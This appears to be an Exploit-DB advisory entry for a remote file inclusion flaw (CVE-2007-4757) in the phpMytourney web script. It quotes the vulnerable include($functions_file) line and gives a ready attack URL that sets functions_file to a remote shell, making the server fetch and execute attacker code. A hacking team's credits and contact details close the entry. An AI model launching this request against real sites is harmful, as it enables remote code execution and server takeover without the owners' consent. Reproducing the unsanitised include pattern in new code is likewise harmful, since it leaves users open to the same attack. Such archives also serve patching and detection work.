phpMytourney menu.php Remote File Inclusion Vulnerability

2007-09-06T00:00:00
ID EDB-ID:4368
Type exploitdb
Reporter S.W.A.T.
Modified 2007-09-06T00:00:00

Description

phpMytourney (menu.php) Remote File Inclusion Vulnerability. CVE-2007-4757. Webapps exploit for php platform

                                        
                                            *******************************************************************************
# Title   :  phpMytourney (functions_file) Remote File Inclusion Vulnerability
# Author  :  S.W.A.T.
# Contact :  S.W.4.T@HackerMail.com
# S.Page  :  http://script.vanta.ru/download.php?id=1178&clas=0
# $$      :  Free
# Site    :  Http://www.XmorS-Security.CoM - Http://www.xmors.com - Http://www.xmors.net
*******************************************************************************
Vuln Code:

include($functions_file);

[[Remote]]]

http://[target]/[path]/menu.php?functions_file=[SHELL]

"""""""""""""""""""""

# I Love XmorsTEAM
# We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T.
# Iranian Hackers & Security TEAM
# Xmors Digital Network Hacking & Security Team

# milw0rm.com [2007-09-06]